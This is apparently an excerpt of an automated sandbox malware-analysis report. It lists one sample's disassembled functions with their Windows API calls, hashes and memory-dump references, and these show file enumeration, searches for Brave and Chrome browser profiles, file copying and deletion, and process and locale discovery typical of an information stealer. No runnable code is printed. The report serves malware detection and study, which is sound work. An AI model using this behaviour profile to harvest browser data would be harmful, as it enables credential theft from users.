                                                                                                                                                                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?,0041D71A,0041D717,00000000,?,?,?,0041DB54,0041D716), ref: 0040B695
                                                                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,0041DB58), ref: 0040B6ED
                                                                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,0041DB5C), ref: 0040B703
                                                                                                                                                                                                                                                                                        • FindNextFileA.KERNELBASE(000000FF,?), ref: 0040BF3B
                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(000000FF), ref: 0040BF4D
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                                                                                                                                                                                                                        • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                                                                                                                                                                                                                                                                        • API String ID: 3334442632-726946144
                                                                                                                                                                                                                                                                                        • Opcode ID: 566b9f3a6f1d7abdc50b2301bb164a70b833557f1510103ad759021b71cd89c1
                                                                                                                                                                                                                                                                                        • Instruction ID: 76d401781d3fce7c968e745dc043d6a6225f477281f2400f678919b217ba5a4c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 566b9f3a6f1d7abdc50b2301bb164a70b833557f1510103ad759021b71cd89c1
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0F423572A0010457CF14FB61DC56EEE773DAF84304F41455EF90AA6181EE38AB89CBE9
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00412570 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 00412589
                                                                                                                                                                                                                                                                                        • FindFirstFileA.KERNELBASE(?,?), ref: 004125A0
                                                                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
                                                                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
                                                                                                                                                                                                                                                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(000000FF), ref: 004127CE
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Find$File$CloseFirstNextwsprintf
                                                                                                                                                                                                                                                                                        • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                                                                                                                                                                        • API String ID: 180737720-445461498
                                                                                                                                                                                                                                                                                        • Opcode ID: 3136d20d887a74a89511f914be1d743d0b7400d11fdd043764b17f3e6c3f3b96
                                                                                                                                                                                                                                                                                        • Instruction ID: 16fd5a9597efbfb91ed0225017393bb16e0f77851f83799e5682f8bc7922baf0
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3136d20d887a74a89511f914be1d743d0b7400d11fdd043764b17f3e6c3f3b96
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 676156B2900618ABCB24EBE0DD99EEA737DBF58701F00458DB61A96140EF74DB85CF94
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00411B80 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 00411B9D
                                                                                                                                                                                                                                                                                        • FindFirstFileA.KERNELBASE(?,?), ref: 00411BB4
                                                                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,0041D834), ref: 00411BE2
                                                                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,0041D838), ref: 00411BF8
                                                                                                                                                                                                                                                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00411D3D
                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(000000FF), ref: 00411D52
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Find$File$CloseFirstNextwsprintf
                                                                                                                                                                                                                                                                                        • String ID: %s\%s
                                                                                                                                                                                                                                                                                        • API String ID: 180737720-4073750446
                                                                                                                                                                                                                                                                                        • Opcode ID: b27c6a61e15bbaddcdd2033fdb989414cee41de35380bbbad86ebbf1a718a96c
                                                                                                                                                                                                                                                                                        • Instruction ID: 1beca0db89a34a7d9f561fb59a57ff38f1a0216f2a844ef05cbde65d1a44dc5a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b27c6a61e15bbaddcdd2033fdb989414cee41de35380bbbad86ebbf1a718a96c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D75168B5900618ABCB24EBB0DC85EEA737DBB48304F40458DB65A96050EB79ABC5CF94
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 004015C0 Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 492filethreadCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215C4,?,00401E03,?,004215C8,?,?,00000000,?,00000000), ref: 00401813
                                                                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,004215CC), ref: 00401863
                                                                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,004215D0), ref: 00401879
                                                                                                                                                                                                                                                                                        • SetThreadLocale.KERNEL32 ref: 00401AC2
                                                                                                                                                                                                                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401C30
                                                                                                                                                                                                                                                                                        • DeleteFileA.KERNEL32(00000000), ref: 00401CB4
                                                                                                                                                                                                                                                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00401D0A
                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(000000FF), ref: 00401D1C
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstLocaleNextThreadlstrlen
                                                                                                                                                                                                                                                                                        • String ID: \*.*
                                                                                                                                                                                                                                                                                        • API String ID: 1950708506-1173974218
                                                                                                                                                                                                                                                                                        • Opcode ID: f7f395177250b460b0db6d785d489f319a667289a3f79a53d58222ccd669c59b
                                                                                                                                                                                                                                                                                        • Instruction ID: 3aa4ae790513c502dab12fd0122e5550b13815c0fff8c800b600eb4522263f51
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f7f395177250b460b0db6d785d489f319a667289a3f79a53d58222ccd669c59b
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D41225759102189BCB15FB61DC56EEE7739AF54308F41419EB10A62091EF38AFC9CFA8
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0040D1C0 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0041DC10,0041D73F), ref: 0040D22B
                                                                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,0041DC14), ref: 0040D273
                                                                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,0041DC18), ref: 0040D289
                                                                                                                                                                                                                                                                                        • FindNextFileA.KERNELBASE(000000FF,?), ref: 0040D4EE
                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(000000FF), ref: 0040D500
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3334442632-0
                                                                                                                                                                                                                                                                                        • Opcode ID: f41b9faf97c03d21ff03c185924b8b342649efa7cdb05378454d2323efcabeab
                                                                                                                                                                                                                                                                                        • Instruction ID: a7e743a2a4f5118c59e4eb5b7e6cabc454f6fbff0e67e47d23a58287cf68124a
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f41b9faf97c03d21ff03c185924b8b342649efa7cdb05378454d2323efcabeab
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 63913B72A0020497CB14FFB1EC569EE777DAB84308F41466EF90A96581EE38D788CBD5
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00414570 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 97memoryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                        • GetKeyboardLayoutList.USER32(00000000,00000000,0041D146), ref: 0041459E
                                                                                                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 004145B6
                                                                                                                                                                                                                                                                                        • GetKeyboardLayoutList.USER32(?,00000000), ref: 004145CA
                                                                                                                                                                                                                                                                                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041461F
                                                                                                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 004146DF
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                                                                                                                                                                                                                                                                        • String ID: /
                                                                                                                                                                                                                                                                                        • API String ID: 3090951853-4001269591
                                                                                                                                                                                                                                                                                        • Opcode ID: 6beba432bb96e3c84f5a57a5e63355993c4d593e46cb58c7d3b5d81651624c51
                                                                                                                                                                                                                                                                                        • Instruction ID: e4a09482d03fe0ac07b2aa12fe49ef9b635f824a972481fa3f662a7a2871ed61
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6beba432bb96e3c84f5a57a5e63355993c4d593e46cb58c7d3b5d81651624c51
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D5413B74940218ABCB24DF50DC89BEDB775BB54308F2042DAE10A66191DB786FC5CF54
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 0040DB60 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,0041D74E), ref: 0040DBD2
                                                                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,0041DC58), ref: 0040DC22
                                                                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,0041DC5C), ref: 0040DC38
                                                                                                                                                                                                                                                                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0040E306
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                                                                                                                                                                                                                                                                        • String ID: \*.*
                                                                                                                                                                                                                                                                                        • API String ID: 433455689-1173974218
                                                                                                                                                                                                                                                                                        • Opcode ID: 72f6734ba949fb204cdb31aa2d361f577838c1988200e0d7a2c5188d89033d93
                                                                                                                                                                                                                                                                                        • Instruction ID: 8f23b39e961a58df861ec407c7814dc8b58ae9c3eb94c511c30fb23e96a564a4
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 72f6734ba949fb204cdb31aa2d361f577838c1988200e0d7a2c5188d89033d93
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 88126771A002145ACB14FB61DC56EED7739AF54308F4142AEB50A66091EF389FC8CFE8
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 004155A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58encryptionCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CryptBinaryToStringA.CRYPT32(00000000,>N@,40000001,00000000,00000000), ref: 004155C0
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: BinaryCryptString
                                                                                                                                                                                                                                                                                        • String ID: >N@
                                                                                                                                                                                                                                                                                        • API String ID: 80407269-3381801619
                                                                                                                                                                                                                                                                                        • Opcode ID: 718bb6be1b75e617e987197471ae693474da6023ddc0167bf927d0320b7ad6f5
                                                                                                                                                                                                                                                                                        • Instruction ID: 37622f5e64546725dbf22d4b9568f407ee9b467eb6af981ec2fff7c5b56759cd
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 718bb6be1b75e617e987197471ae693474da6023ddc0167bf927d0320b7ad6f5
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 73110D74200A04FFDB10CFA4E844FEB37AABF89310F509549F9098B254D775E881DBA4
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 00415D00 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00415D1E
                                                                                                                                                                                                                                                                                        • Process32First.KERNEL32(0041D599,00000128), ref: 00415D32
                                                                                                                                                                                                                                                                                        • Process32Next.KERNEL32(0041D599,00000128), ref: 00415D47
                                                                                                                                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,00000000), ref: 00415D5C
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(0041D599), ref: 00415D7A
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 420147892-0
                                                                                                                                                                                                                                                                                        • Opcode ID: f6d0f21b7cc225942ebaf2b71921687e4bacd107d031d79921886f9976f157bb
                                                                                                                                                                                                                                                                                        • Instruction ID: 4a4bbd9776da2ad99231b6c5471aa9e11f786ff18f9e7f574f496e4dc08d41d8
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f6d0f21b7cc225942ebaf2b71921687e4bacd107d031d79921886f9976f157bb
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 53012575A00608EBDB24DF94DD58BDEB7B9BF88304F108189E90597250DB749B81CF50
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        Function 004144B0 Relevance: 6.0, APIs: 4, Instructions: 32memorytimeCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,044062E0,00000000,?,0041D758,00000000,?,00000000,00000000,?,04406E58,00000000), ref: 004144C0
                                                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 004144C7
                                                                                                                                                                                                                                                                                        • GetTimeZoneInformation.KERNEL32(?), ref: 004144DA
                                                                                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 00414514
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 362916592-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 3e8ee039c0baa52381bc867147264b9e0472758f99ecf5fc77eb662dd471fe6c
                                                                                                                                                                                                                                                                                        • Instruction ID: 63b956e3650aea0bdd01ac085b80a838c67200ff8d98e36f2a49cf33a9f6a1bd
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3e8ee039c0baa52381bc867147264b9e0472758f99ecf5fc77eb662dd471fe6c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C7F06770E047289BDB309B64DD49FA9737ABB44311F0002D5EA0AE3291DB749E858F97
